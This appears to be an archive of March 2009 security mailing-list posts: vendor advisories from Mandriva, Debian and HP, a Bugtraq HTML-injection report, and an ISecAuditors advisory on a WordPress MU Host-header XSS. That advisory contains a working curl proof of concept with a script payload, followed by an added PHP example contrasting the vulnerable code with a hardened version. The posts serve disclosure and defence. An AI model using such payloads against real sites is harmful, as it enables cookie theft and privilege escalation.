402e81c8f408dd6cf76069163e5005b5 2009.0/i586/vboxvfs-kernel-2.6.27.19-desktop586-1mnb-2.0.2-2.1mdv2009.0.i586.rpm
d46a98e24e9eade0625ac0ddc824b21e 2009.0/i586/vboxvfs-kernel-2.6.27.19-server-1mnb-2.0.2-2.1mdv2009.0.i586.rpm
f3cb5d805d8a5787e2ca57f28eb52529 2009.0/i586/vboxvfs-kernel-desktop586-latest-2.0.2-1.20090305.2.1mdv2009.0.i586.rpm
e2b5b411390ed737e4fcebbc364b5a4f 2009.0/i586/vboxvfs-kernel-desktop-latest-2.0.2-1.20090305.2.1mdv2009.0.i586.rpm
cbd8cd9d0405eac1939629533ef8fe02 2009.0/i586/vboxvfs-kernel-server-latest-2.0.2-1.20090305.2.1mdv2009.0.i586.rpm
34d17ced32a45f67e7f85185c3b2a7bb 2009.0/i586/vhba-kernel-2.6.27.19-desktop-1mnb-1.0.0-1.svn304.1mdv2009.0.i586.rpm
8cd923691e9c04811a1d2eafa32fa091 2009.0/i586/vhba-kernel-2.6.27.19-desktop586-1mnb-1.0.0-1.svn304.1mdv2009.0.i586.rpm
d6b8d565712b513d4e31ce08411c3cc9 2009.0/i586/vhba-kernel-2.6.27.19-server-1mnb-1.0.0-1.svn304.1mdv2009.0.i586.rpm
fb6c3b61defffb731bd8143e8ea56efe 2009.0/i586/vhba-kernel-desktop586-latest-1.0.0-1.20090305.1.svn304.1mdv2009.0.i586.rpm
b2505d5bb99c5889a12e2e089e549669 2009.0/i586/vhba-kernel-desktop-latest-1.0.0-1.20090305.1.svn304.1mdv2009.0.i586.rpm
1207949eafe27831fdd8695ea118ddfe 2009.0/i586/vhba-kernel-server-latest-1.0.0-1.20090305.1.svn304.1mdv2009.0.i586.rpm
13af97bb172b5647d388dea63f7afdeb 2009.0/i586/virtualbox-kernel-2.6.27.19-desktop-1mnb-2.0.2-2.1mdv2009.0.i586.rpm
242b990d08b0795552e3ded15091ca9a 2009.0/i586/virtualbox-kernel-2.6.27.19-desktop586-1mnb-2.0.2-2.1mdv2009.0.i586.rpm
4498313356e483be80ae72ba8a06f4aa 2009.0/i586/virtualbox-kernel-2.6.27.19-server-1mnb-2.0.2-2.1mdv2009.0.i586.rpm
6572f7084ab8fa7ce55dc23137e539eb 2009.0/i586/virtualbox-kernel-desktop586-latest-2.0.2-1.20090305.2.1mdv2009.0.i586.rpm
4b5c0c2b8dc899fb686021271ba6361a 2009.0/i586/virtualbox-kernel-desktop-latest-2.0.2-1.20090305.2.1mdv2009.0.i586.rpm
2d3a307b25fe2cef9cd6ea1a459c29d2 2009.0/i586/virtualbox-kernel-server-latest-2.0.2-1.20090305.2.1mdv2009.0.i586.rpm
1e54fb41c4c6723108369e9b34233038 2009.0/i586/vpnclient-kernel-2.6.27.19-desktop-1mnb-4.8.01.0640-3mdv2009.0.i586.rpm
fe82daedce3d043ad3076c760a6b45e7 2009.0/i586/vpnclient-kernel-2.6.27.19-desktop586-1mnb-4.8.01.0640-3mdv2009.0.i586.rpm
872dd1a1024376324b12de05b84b2dfd 2009.0/i586/vpnclient-kernel-2.6.27.19-server-1mnb-4.8.01.0640-3mdv2009.0.i586.rpm
98ec90796498ee16c43c2e16d5f52640 2009.0/i586/vpnclient-kernel-desktop586-latest-4.8.01.0640-1.20090305.3mdv2009.0.i586.rpm
6fa03085ae3c3e7b7472131f4f6b7254 2009.0/i586/vpnclient-kernel-desktop-latest-4.8.01.0640-1.20090305.3mdv2009.0.i586.rpm
828088821547485bfb7cfc52e05763a3 2009.0/i586/vpnclient-kernel-server-latest-4.8.01.0640-1.20090305.3mdv2009.0.i586.rpm
9449cc7da776f4b2a5f72e386f555cbc 2009.0/SRPMS/kernel-2.6.27.19-1mnb2.src.rpm
Mandriva Linux 2009.0/X86_64:
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
Date: Tue, 10 Mar 2009 21:26:46 +0100
From: ISecAuditors Security Advisories <advisories@isecauditors.com>
Organization: Internet Security Auditors
Subject: [ISecAuditors Security Advisories] WordPress MU HTTP Header XSS Vulnerability
============================================
INTERNET SECURITY AUDITORS ALERT 2009-004
- Original release date: December 3rd, 2008
- Last revised: March 10th, 2009
- Discovered by: Juan Galiana Lara
- Severity: 6.3/10 (CVSS scored)
============================================
I. VULNERABILITY
-------------------------
WordPress MU < 2.7 'Host' HTTP Header Cross Site Scripting (XSS)
Vulnerability
II. BACKGROUND
-------------------------
WordPress MU, or multi-user, allows running unlimited blogs with a
single install of WordPress. It is most famously used for
WordPress.com where it serves tens of millions of hits on hundreds of
thousands of blogs each day. It is also used on many other sites like
Harvard University and Le Monde.
III. DESCRIPTION
-------------------------
WordPress MU prior to version 2.7 fails to sanitize the Host header
correctly in the choose_primary_blog function and is therefore prone to
XSS attacks.
Web sites running in a name-based virtual hosting setup are not
affected as long as they are not the default virtual host.
IV. PROOF OF CONCEPT
-------------------------
The snippet of vulnerable code:
In wp-includes/wpmu-functions.php, concretely in the function
choose_primary_blog:
1830 function choose_primary_blog() {
1831     global $current_user;
1832     ?>
1833     <table class="form-table">
1834     <tr>
1835         <th scope="row"><?php _e('Primary Blog'); ?></th>
1836         <td>
1837         <?php
1838         $all_blogs = get_blogs_of_user( $current_user->ID );
1839         if( count( $all_blogs ) > 1 ) {
1840             $primary_blog = get_usermeta($current_user->ID, 'primary_blog');
1841             ?>
1842             <select name="primary_blog">
1843                 <?php foreach( (array) $all_blogs as $blog ) { ?>
1844                     <option value='<?php echo $blog->userblog_id ?>'<?php if( $primary_blog == $blog->userblog_id ) echo ' selected="selected"' ?>>http://<?php echo $blog->domain.$blog->path ?></option>
1845                 <?php } ?>
1846             </select>
1847             <?php
1848         } else {
1849             echo $_SERVER['HTTP_HOST']; <- HERE
1850         }
1851         ?>
1852         </td>
1853     </tr>
1854     </table>
1855     <?php
1856 }
Line 1849 contains the affected code "echo $_SERVER['HTTP_HOST'];"
and it is possible to inject HTML and script code by crafting the HTTP Host header:
PoC:
$ curl -H "Cookie: my cookies here" -H "Host: <body onload=alert(String.fromCharCode(88,83,83))>" http://www.example.com/wp-admin/profile.php > tmp.html
$ firefox tmp.html
The JavaScript code will be executed in the context of the victim's
browser; this can be exploited to steal cookies and escalate
privileges to administrator.
Tested with Wordpress MU 2.6.5, Apache 2.2 and Mozilla Firefox 3.0.6
V. BUSINESS IMPACT
-------------------------
The impact is that the attacker can gain administrator privileges on the
application.
VI. SYSTEMS AFFECTED
-------------------------
Versions prior to 2.7 are affected
VII. SOLUTION
-------------------------
Upgrade to version 2.7 of WordPress multi-user. It can be downloaded
from http://mu.wordpress.org
VIII. REFERENCES
-------------------------
http://mu.wordpress.org
IX. CREDITS
-------------------------
This vulnerability has been discovered
by Juan Galiana Lara (jgaliana (at) isecauditors (dot) com).
X. REVISION HISTORY
-------------------------
December 03, 2008: Initial release
March 02, 2009: More details added
XI. DISCLOSURE TIMELINE
-------------------------
December 03, 2008: Vendor contacted
December 03, 2008: MU trunk code fixed
January 28, 2008: WordPress MU 2.7 released
March 10, 2009: Vulnerability published by
Internet Security Auditors (www.isecauditors.com)
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.
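The pattern reported in the advisory above, next to a hardened form. This is an added example, not part of the original advisory and not WordPress MU code; the function names, the allowlist and the fallback host are assumptions made for illustration.

```php
<?php
// Added illustration; not WordPress MU source. All function names, the
// allowlist and the fallback host below are hypothetical.

// Vulnerable pattern (advisory line 1849): the client-supplied Host header
// is written into the page without validation or output encoding.
function render_primary_blog_vulnerable(array $server): string
{
    return '<td>' . $server['HTTP_HOST'] . '</td>';
}

// Syntactic check: dot-separated DNS labels (or an IPv4 literal) with an
// optional port. Bracketed IPv6 literals are rejected here for brevity.
function is_wellformed_host(string $host): bool
{
    if ($host === '' || strlen($host) > 255) {
        return false;
    }
    $label = '[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?';
    return preg_match('/^' . $label . '(?:\.' . $label . ')*(?::[0-9]{1,5})?$/iD', $host) === 1;
}

// Hardened pattern: (1) accept the header only if it is well formed and names
// a host this installation serves, (2) HTML-encode whatever is printed, so a
// mistake in step 1 still cannot produce markup.
function render_primary_blog_hardened(array $server, array $allowed_hosts, string $fallback): string
{
    $host = strtolower(trim($server['HTTP_HOST'] ?? ''));
    $name = preg_replace('/:[0-9]{1,5}$/D', '', $host);   // drop the port for the lookup
    if (!is_wellformed_host($host) || !in_array($name, $allowed_hosts, true)) {
        $host = $fallback;
    }
    return '<td>' . htmlspecialchars($host, ENT_QUOTES, 'UTF-8') . '</td>';
}

// Constructed sample requests; the second Host value is the one from the PoC.
$allowed = ['blogs.example.com'];
$samples = [
    'blogs.example.com',
    '<body onload=alert(String.fromCharCode(88,83,83))>',
    'BLOGS.example.com:8080',
    'other.example.net',
];
foreach ($samples as $h) {
    $server = ['HTTP_HOST' => $h];
    echo "Host header : $h\n";
    echo "  vulnerable: " . render_primary_blog_vulnerable($server) . "\n";
    echo "  hardened  : " . render_primary_blog_hardened($server, $allowed, 'blogs.example.com') . "\n";
}
```

Output encoding alone stops the markup injection; the allowlist additionally keeps a well-formed but unexpected host name out of the page.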
From - Tue Mar 10 17:01:13 2009
From: Florian Weimer <fw@deneb.enyo.de>
Date: Tue, 10 Mar 2009 21:23:49 +0100
Subject: [SECURITY] [DSA 1735-1] New znc packages fix privilege escalation
------------------------------------------------------------------------
Debian Security Advisory DSA-1735-1                  security@debian.org
http://www.debian.org/security/                           Florian Weimer
March 10, 2009                        http://www.debian.org/security/faq
------------------------------------------------------------------------
Package : znc
Vulnerability : missing input sanitization
Problem type : remote
Debian-specific: no
CVE Id(s) : CVE-2009-0759
Debian Bug : 516950
It was discovered that znc, an IRC proxy/bouncer, does not properly
sanitize input contained in configuration change requests to the
webadmin interface. This allows authenticated users to elevate their
privileges and indirectly execute arbitrary commands (CVE-2009-0759).
For the old stable distribution (etch), this problem has been fixed in
version 0.045-3+etch2.
For the stable distribution (lenny), this problem has been fixed in
version 0.058-2+lenny1.
For the unstable distribution (sid), this problem has been fixed in
version 0.066-1.
We recommend that you upgrade your znc packages.
Upgrade instructions
--------------------
wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.
If you are using the apt-get package manager, use the line for
sources.list as given below:
apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages
You may use an automated update by adding the resources from the
footer to the proper configuration.
Debian GNU/Linux 4.0 alias etch
-------------------------------
Source archives:
http://security.debian.org/pool/updates/main/z/znc/znc_0.045.orig.tar.gz
Size/MD5 checksum: 204863 9a514b125b7514811fd03befa73cce77
http://security.debian.org/pool/updates/main/z/znc/znc_0.045-3+etch2.dsc
Size/MD5 checksum: 962 1962af4c56b4c4c169832249d6b99f30
http://security.debian.org/pool/updates/main/z/znc/znc_0.045-3+etch2.diff.gz
Size/MD5 checksum: 12817 c254e989604122fb7267a0fafeddfd95
alpha architecture (DEC Alpha)
http://security.debian.org/pool/updates/main/z/znc/znc_0.045-3+etch2_alpha.deb
Size/MD5 checksum: 859792 f154f471d3b0d42d7b7cfe8eebaf3134
amd64 architecture (AMD x86_64 (AMD64))
http://security.debian.org/pool/updates/main/z/znc/znc_0.045-3+etch2_amd64.deb
Size/MD5 checksum: 793694 80c9126c518abe062265cee5d94ca6f1
hppa architecture (HP PA RISC)
http://security.debian.org/pool/updates/main/z/znc/znc_0.045-3+etch2_hppa.deb
Size/MD5 checksum: 857356 04a64d64b5a4582fcd7db3bef32822ec
i386 architecture (Intel ia32)
http://security.debian.org/pool/updates/main/z/znc/znc_0.045-3+etch2_i386.deb
Size/MD5 checksum: 806592 99b63e880bbba2841f30ed006fbe2364
ia64 architecture (Intel ia64)
http://security.debian.org/pool/updates/main/z/znc/znc_0.045-3+etch2_ia64.deb
Size/MD5 checksum: 957620 061cfe882476dc4ad55caf16ec8c7af8
mips architecture (MIPS (Big Endian))
http://security.debian.org/pool/updates/main/z/znc/znc_0.045-3+etch2_mips.deb
Size/MD5 checksum: 713450 625f8ed77be76269bd78f4414ed55a61
mipsel architecture (MIPS (Little Endian))
http://security.debian.org/pool/updates/main/z/znc/znc_0.045-3+etch2_mipsel.deb
Size/MD5 checksum: 710332 5b07981be622bf78839d2376af142e3d
powerpc architecture (PowerPC)
http://security.debian.org/pool/updates/main/z/znc/znc_0.045-3+etch2_powerpc.deb
Size/MD5 checksum: 789838 5c75fc8a345a20c6b6e39e2eb97cd004
s390 architecture (IBM S/390)
http://security.debian.org/pool/updates/main/z/znc/znc_0.045-3+etch2_s390.deb
Size/MD5 checksum: 730066 514965b8fa4913d2e1ff13630bd5957a
sparc architecture (Sun SPARC/UltraSPARC)
http://security.debian.org/pool/updates/main/z/znc/znc_0.045-3+etch2_sparc.deb
Size/MD5 checksum: 747502 6b72758d93bb4ddc392ef6cfa119a5c2
Debian GNU/Linux 4.0 alias lenny
-------------------------------
Source archives:
http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny1.dsc
Size/MD5 checksum: 1332 c657b80b61750fc072ce257c1d682b21
http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny1.diff.gz
Size/MD5 checksum: 8253 04053487dbf0b49da04ded749d1c384e
http://security.debian.org/pool/updates/main/z/znc/znc_0.058.orig.tar.gz
Size/MD5 checksum: 340741 c02fd740c55d5b3a7912f7584344103e
alpha architecture (DEC Alpha)
http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny1_alpha.deb
Size/MD5 checksum: 1096362 92f9a65cd06d7da250f79a3d11e0a124
amd64 architecture (AMD x86_64 (AMD64))
http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny1_amd64.deb
Size/MD5 checksum: 1028438 f2058b3d07a9233cef8f9ca0dfec6673
arm architecture (ARM)
http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny1_arm.deb
Size/MD5 checksum: 1149682 3ed9f92e4ca7ee29ff3c60897cc71c21
hppa architecture (HP PA RISC)
http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny1_hppa.deb
Size/MD5 checksum: 1163022 359b9459a44f3653e2571cda2fb51085
i386 architecture (Intel ia32)
http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny1_i386.deb
Size/MD5 checksum: 1013106 15b468bd87a584a0415584452d26ab38
ia64 architecture (Intel ia64)
http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny1_ia64.deb
Size/MD5 checksum: 1181082 f86b365aa064e782ea72a82d216edd62
mips architecture (MIPS (Big Endian))
http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny1_mips.deb
Size/MD5 checksum: 916040 f6c21df1590da49c335bc76860e5af8d
mipsel architecture (MIPS (Little Endian))
http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny1_mipsel.deb
Size/MD5 checksum: 906310 d156e11c8c0bedb5dd56fcfcf40730e9
powerpc architecture (PowerPC)
http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny1_powerpc.deb
Size/MD5 checksum: 1034324 29a41349db3b895e1a6bdf0bdf249ff8
s390 architecture (IBM S/390)
http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny1_s390.deb
Size/MD5 checksum: 970792 b0f4f9f9b0e38309fca19dabe60beef4
sparc architecture (Sun SPARC/UltraSPARC)
http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny1_sparc.deb
Size/MD5 checksum: 1000006 ea9cd30f00b2f9466dfeb84e96198099
These files will probably be moved into the stable distribution on
its next update.
---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
From - Wed Mar 11 10:51:13 2009
Date: Tue, 10 Mar 2009 15:16:51 -0600
From: sosoblood@hotmail.com
To: bugtraq@securityfocus.com
Subject: Sun Java System Communications Express [HTML Injection]
Hello,
I have found an HTML Injection vulnerability in Sun Java™ System Communications Express, a web client that provides an integrated web-based communication and collaboration client to the Sun Java Communications Suite. It consists of three client modules - Calendar, Address Book, and Mail.
Here is a screen-shot that demonstrates the vulnerability:
http://sosoblood.freehostia.com/SJSC/html_injection.gif
As we can see in the picture, I was able to inject some HTML and make my name in bold at the header of the page. Also, I was able to inject an image in the test message subject that I sent to myself.
One can also inject an IFRAME or any HTML tag.
However, the potential threat is limited by the limited character size of some fields like the "Full Name" at the header of the page and the "Subject" of a message. So injecting long strings is impossible.
A solution for this vulnerability is implemented by using the htmlentities() function.
Thank you for reading.
Edgard Chammas [454447415244].
From - Wed Mar 11 12:01:13 2009
Date: Tue, 10 Mar 2009 21:33:38 +0100
From: Steffen Joeris <white@debian.org>
Sender: Moritz Muehlenhoff <jmm@debian.org>
Subject: [SECURITY] [DSA 1736-1] New mahara packages fix cross-site scripting
------------------------------------------------------------------------
Debian Security Advisory DSA-1736-1                  security@debian.org
http://www.debian.org/security/                           Steffen Joeris
March 10, 2009                        http://www.debian.org/security/faq
------------------------------------------------------------------------
Package : mahara
Vulnerability : insufficient input sanitising
Problem type : remote
Debian-specific: no
CVE ID : CVE-2009-0660
It was discovered that mahara, an electronic portfolio, weblog, and
resume builder, is prone to cross-site scripting attacks, which allows
the injection of arbitrary Java or HTML code.
For the stable distribution (lenny), this problem has been fixed in
version 1.0.4-4+lenny1.
The oldstable distribution (etch) does not contain mahara.
For the testing distribution (squeeze) and the unstable distribution
(sid), this problem will be fixed soon.
We recommend that you upgrade your mahara package.
Upgrade instructions
--------------------
wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.
If you are using the apt-get package manager, use the line for
sources.list as given below:
apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages
You may use an automated update by adding the resources from the
footer to the proper configuration.
Debian GNU/Linux 5.0 alias lenny
--------------------------------
Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.
Source archives:
http://security.debian.org/pool/updates/main/m/mahara/mahara_1.0.4-4+lenny1.dsc
Size/MD5 checksum: 1303 e78e2f84879067ead786f022b3fb9e65
http://security.debian.org/pool/updates/main/m/mahara/mahara_1.0.4-4+lenny1.diff.gz
Size/MD5 checksum: 38565 dab9ae59c86acc880749118e0c7fab20
http://security.debian.org/pool/updates/main/m/mahara/mahara_1.0.4.orig.tar.gz
Size/MD5 checksum: 2383079 cf1158e4fe3cdba14fb1b71657bf8cc9
Architecture independent packages:
http://security.debian.org/pool/updates/main/m/mahara/mahara_1.0.4-4+lenny1_all.deb
Size/MD5 checksum: 1636658 52d68deb52604b9d5ae0ad910ef0ef78
http://security.debian.org/pool/updates/main/m/mahara/mahara-apache2_1.0.4-4+lenny1_all.deb
Size/MD5 checksum: 7778 9b1ddde46afd38972b0789e0c18e740a
These files will probably be moved into the stable distribution on
its next update.
---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
From - Wed Mar 11 12:11:13 2009
To: bugtraq@securityfocus.com
From: security-alert@hp.com
Subject: [security bulletin] HPSBUX02411 SSRT080111 rev.1 - HP-UX Running Java, Remote Execution of Arbitrary Code and Other Vulnerabilities
Date: Wed, 11 Mar 2009 08:20:52 -0700
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c01683026
Version: 1
HPSBUX02411 SSRT080111 rev.1 - HP-UX Running Java, Remote Execution of Arbitrary Code and Other Vulnerabilities
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2009-03-09
Last Updated: 2009-03-09
Potential Security Impact: Multiple remote vulnerabilities
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified in Java Runtime Environment (JRE) and Java Developer Kit (JDK) running on HP-UX. These vulnerabilities may allow remote unauthorized access, privilege escalation, execution of arbitrary code, and creation of a Denial of Service (DoS).
References: SUNALERT ID: 244988 (CVE-2008-2086, CVE-2008-5339, CVE-2008-5340, CVE-2008-5341, CVE-2008-5342, CVE-2008-5343, CVE-2008-5344), 246387 (CVE-2008-5345), 246366 (CVE-2008-5347), 246346 (CVE-2008-5348), 246266 (CVE-2008-5350), 245246 (CVE-2008-5351), 244991 (CVE-2008-5353), 244990 (CVE-2008-5354), 244987 (CVE-2008-5356, CVE-2008-5357, CVE-2008-5358, CVE-2008-5359), 244986 (CVE-2008-5360)
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.11, B.11.23, B.11.31 running HP JDK and JRE 6.0.02 or earlier
HP-UX B.11.11, B.11.23, B.11.31 running HP JDK and JRE 5.0.14 or earlier
HP-UX B.11.11, B.11.23, B.11.31 running HP Java SDK and RTE 1.4.2.20 or earlier
BACKGROUND
CVSS 2.0 Base Metrics
==============================================
Reference Base Vector Base Score
CVE-2008-2086 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3
CVE-2008-5339 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2008-5340 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2008-5341 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
CVE-2008-5342 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
CVE-2008-5343 (AV:N/AC:L/Au:N/C:C/I:P/A:P) 9.0
CVE-2008-5344 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2008-5345 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2008-5347 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2008-5348 (AV:N/AC:M/Au:N/C:N/I:N/A:C) 7.1
CVE-2008-5350 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
CVE-2008-5351 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2008-5353 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2008-5354 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3
CVE-2008-5356 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3
CVE-2008-5357 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3
CVE-2008-5358 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3
CVE-2008-5359 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3
CVE-2008-5360 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4
==============================================
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided the following upgrades to resolve these vulnerabilities.
The upgrades are available from the following location:
http://www.hp.com/go/java
HP-UX B.11.31
JDK and JRE v6.0.03 or subsequent
JDK and JRE v5.0.15 or subsequent
SDK and JRE v1.4.2.21 or subsequent
HP-UX B.11.23
JDK and JRE v6.0.03 or subsequent
JDK and JRE v5.0.15 or subsequent
SDK and JRE v1.4.2.21 or subsequent
HP-UX B.11.11
JDK and JRE v6.0.03 or subsequent
JDK and JRE v5.0.15 or subsequent
SDK and JRE v1.4.2.21 or subsequent
MANUAL ACTIONS: Yes - Update
For Java v6.0.02 and earlier, update to Java v6.0.03 or subsequent.
For Java v5.0.14 and earlier, update to Java v5.0.15 or subsequent.
For Java v1.4.2.20 and earlier, update to Java v1.4.2.21 or subsequent.
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa
The following text is for use by the HP-UX Software Assistant.
AFFECTED VERSIONS
HP-UX B.11.11
HP-UX B.11.23
HP-UX B.11.31
==========
Jdk14.JDK14-COM
Jdk14.JDK14-IPF32
Jdk14.JDK14-IPF64
Jdk14.JDK14-PA11
Jdk14.JDK14-PA20
Jdk14.JDK14-PA20W
Jre14.JRE14-COM
Jre14.JRE14-IPF32
Jre14.JRE14-IPF32-HS
Jre14.JRE14-IPF64
Jre14.JRE14-IPF64-HS
Jre14.JRE14-PA11
Jre14.JRE14-PA11-HS
Jre14.JRE14-PA20
Jre14.JRE14-PA20-HS
Jre14.JRE14-PA20W
Jre14.JRE14-PA20W-HS
action: install revision 1.4.2.21.00 or subsequent
Jdk15.JDK15-COM
Jdk15.JDK15-PA20
Jdk15.JDK15-PA20W
Jdk15.JDK15-IPF32
Jdk15.JDK15-IPF64
Jre15.JRE15-COM
Jre15.JRE15-PA20
Jre15.JRE15-PA20-HS
Jre15.JRE15-PA20W
Jre15.JRE15-PA20W-HS
Jre15.JRE15-IPF32
Jre15.JRE15-IPF32-HS
Jre15.JRE15-IPF64
Jre15.JRE15-IPF64-HS
action: install revision 1.5.0.15.00 or subsequent
Jdk60.JDK60-COM
Jdk60.JDK60-PA20
Jdk60.JDK60-PA20W
Jdk60.JDK60-IPF32
Jdk60.JDK60-IPF64
Jre60.JRE60-COM
Jre60.JRE60-IPF32
Jre60.JRE60-IPF32-HS
Jre60.JRE60-IPF64
Jre60.JRE60-IPF64-HS
Jre60.JRE60-PA20
Jre60.JRE60-PA20-HS
Jre60.JRE60-PA20W
Jre60.JRE60-PA20W-HS
action: install revision 1.6.0.03.00 or subsequent
END AFFECTED VERSIONS
HISTORY
Version:1 (rev.1) 9 March 2009 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For further information, contact normal HP Services support channel.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.
To get the security-alert PGP key, please send an e-mail message as follows:
To: security-alert@hp.com
Subject: get key
Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC
On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches
- check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems
- verify your operating system selections are checked and save.
To update an existing subscription:
http://h30046.www3.hp.com/subSignIn.php
Log in on the web page: Subscriber's choice for Business: sign-in.
On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.
To review previously published Security Bulletins visit:
http://www.itrc.hp.com/service/cki/secBullArchive.do
* The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title:
GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault
System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.
"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."
©Copyright 2009 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1
iQA/AwUBSbZgP+AfOvwtKn1ZEQLqWgCgpK0tTDWGRJkDVpWzhFqI3asVAsMAnjKq
R3jvTn4bcr1e7cmNVRj6zNp+
=8OKZ
-----END PGP SIGNATURE-----
From - Wed Mar 11 13:41:13 2009
To: bugtraq@securityfocus.com
From: security-alert@hp.com
Subject: [security bulletin] HPSBMA02412 SSRT080040 rev.1 - WMI Mapper for HP Systems Insight Manager Running on Windows, Remote Unauthorized Access to Data, Local Unauthorized Access
Date: Wed, 11 Mar 2009 08:20:07 -0700
Sender: secure@hpchs.cup.hp.com
Message-Id: <20090311152008.4454FBF78@hpchs.cup.hp.com>
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c01655638
Version: 1
HPSBMA02412 SSRT080040 rev.1 - WMI Mapper for HP Systems Insight Manager Running on Windows, Remote Unauthorized Access to Data, Local Unauthorized Access
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2009-03-09
